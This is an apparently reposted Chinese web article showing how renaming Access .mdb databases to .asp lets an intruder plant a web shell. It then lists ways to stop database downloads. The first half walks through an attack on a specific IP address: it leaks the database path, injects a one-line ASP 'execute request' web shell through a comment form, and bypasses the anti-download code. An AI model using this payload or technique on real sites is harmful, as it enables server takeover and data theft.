0514-86177077

9:00-17:00(工作日)

主页 > 知识库 > access改mdb为asp所带来的灾难 附mdb防下载方法

access改mdb为asp所带来的灾难 附mdb防下载方法
热门标签:智能电销机器人适用于哪些行业 徐州人工智能电销机器人好用吗 长沙防封电销卡品牌 地图标注服务哪家好 西宁公司外呼系统平台 腾讯地图标注商户关闭 地图标注宅基地 武汉营销电话机器人软件 外呼系统还用卡么
先不说直接改后缀,直接可以用网快等工具直接下载,其实这样你已经是为入侵者打开了大门。入侵者可以利用asp/asa为后缀的数据库直接得到webshell。

一.思路

  大家都知道%%>为asp文件的标志符,也就是说一个asp文件只会去执行%%>之间的代码,access+asp的web系统的所有数据都是存放在数据库文件里(mdb文件),由于管理者把mdb文件改为了asp文件,如果我们提交的数据里包含有%%>,那当我们访问这个asp数据库的时候就会去执行%%>之间的代码。这样导致我们只提交恶意代码给数据库,那么asp后缀的数据库就是我们的webshell了。

二.示例

  随便找个目标,首先我们暴库,看是不是asp后缀的数据库:http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5log_id=210


  返回:
复制代码 代码如下:

Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 错误 '80004005'

'D:\log_mdb\%29dlog_mdb%29.asp'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。

/test/conn.asp,行18


  我们提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的乱码,这样我们可以直接用网际快车等工具直接下载数据库(这里我们不讨论)。我们回到主页看到有提供“网友评论”功能。我们注册个用户,发一条评论:

%execute request("b")%>

  这样我们就把asp代码:%execute request("b")%>写入了数据库,那么数据库:就是我们的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在乱码的最后我们看到:

复制代码 代码如下:

/iisHelp/common/500-100.asp,行242
Microsoft VBScript 运行时错误 错误 '800a000d'

类型不匹配: 'execute'

/test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266


  注意:我们在向数据库提交代码时,代码内容不可以太大。所以我们采用%execute request("b")%>。

三.其他一些问题和思路

  1.对于改了后缀为asp,还对数据库里加入了%='a'-1%>等非法的asp代码来彻底防止下载的数据库,由于里面存在了非法的asp代码,插入我们的webshell代码后运行,将只会显示前面非法代码的错误,而不去执行我们shell的代码。虽然这样可以防止一定的攻击,但还是存在一定的隐患,我们只要在出错的代码前加入兼容错误的代码,就可以得到正确显示执行我们插入的webshell代码了。

  2.对于没有改后缀的,也就是mdb文件,这样我们可以先直接下载下来得到后台密码,进了后台,可以利用数据库备用改后缀为asp。

mdb防下载方法小结

1:在iis6下面 如果一个扩展名没有被定义则 访问的时候会出现文件没有找到的404错误。
因此你可以将数据库任意命名成一个绝对不会出现的文件名就可以达到安全的效果比如:xxxxx.xxxxxxxxxxx


2 将数据库放在网站的外部,那绝对就不能访问得到了。例如: e:/web/是你的网站
则把数据库放在e:/

3 正如楼上所说的 将.mdb 改成 .asp 同时倒入一个特殊的表 包含 % 的二进制字符 这样访问文件出现 缺少脚本关闭符的提示。
4 或者将.mdb 改成.asp 同时用winhex打开 可以发现176以后有很长一部分 00 字符串 你随便在处改成一段asp代码 也可以实现防止下载,这样也不影响数据库功能。例如:
%
response.write("非法访问")
response.end()
%>


现在在数据库的名称里 加上 “#” 和空格 都被破解了 比如“#” = “%35” 而空格 = “%20”

所以说 现在用这些已经不管用了。。


如果是自己的服务器的话就在IIS里设置一下:

新建一个空白的DLL文件,然后在IIS里添加映射,可执行文件选刚才建的这个DLL,扩展名填.mdb,保存后重启一下IIS服务即可。
您可能感兴趣的文章:
  • IIS下防止mdb数据库被下载的实现方法
  • 九种防MDB数据库被下载的方法小结

标签:雅安 通化 通辽 荆门 普洱 巴彦淖尔 运城 鹰潭

巨人网络通讯声明:本文标题《access改mdb为asp所带来的灾难 附mdb防下载方法》,本文关键词  access,改,mdb,为,asp,所,带来,;如发现本文内容存在版权问题,烦请提供相关信息告之我们,我们将及时沟通与处理。本站内容系统采集于网络,涉及言论、版权与本站无关。
  • 相关文章
  • 下面列出与本文章《access改mdb为asp所带来的灾难 附mdb防下载方法》相关的同类信息!
  • 本页收集关于access改mdb为asp所带来的灾难 附mdb防下载方法的相关信息资讯供网民参考!
    • 推荐文章

    上一篇:asp IsValidEmail 验证邮箱地址函数(email)

    下一篇:asp textarea 多行数组分割处理方法

    Copyright © 1999-2012 诚信 合法 规范的巨人网络通讯始建于2005年

    苏ICP备15040257号-8

    产品关键词: access改mdb为asp所带来的灾难 附mdb防下载方法 access,改,mdb,为,asp,所,带来,